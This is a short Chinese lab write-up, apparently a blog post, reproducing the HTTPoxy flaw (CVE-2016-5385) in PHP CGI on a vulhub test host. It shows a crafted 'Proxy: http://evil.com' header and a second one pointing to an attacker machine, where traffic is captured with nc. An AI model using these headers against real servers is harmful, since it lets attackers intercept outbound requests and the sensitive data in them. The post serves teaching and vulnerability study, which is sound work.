vulhub漏洞复现五_cgi

CVE-2016-5385_HTTPoxy漏洞_PHP

靶场:192.168.4.10_ubuntu

前言

根据RFC 3875规定,CGI(fastcgi)要将用户传入的所有HTTP头都加上`HTTP_`前缀放入环境变量中,而恰好大多数类库约定俗成会提取环境变量中的`HTTP_PROXY`值作为HTTP代理地址。于是,恶意用户通过提交`Proxy: http://evil.com`这样的HTTP头,将使用缺陷类库的网站的代理设置为`http://evil.com`,进而窃取数据包中可能存在的敏感信息。

漏洞复现

本环境使用PHP 5.6.23为例。

1. 环境搭建

#docker-compose up -d

2. 漏洞利用

访问http://192.168.4.10:8080/index.php,可看到origin:显示为当前请求服务地址

添加附带头Proxy: http://*.*.*.114:30001 ,访问http://192.168.4.10:8080/index.php,,

综上,真正进行HTTP访问的服务器是`*.*.*.114`,也就是说正常的HTTP请求代理在`*.*.*.114`上,在`*.*.*.114`上使用NC,就可以捕获当前请求的数据包,其中可能包含敏感数据。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值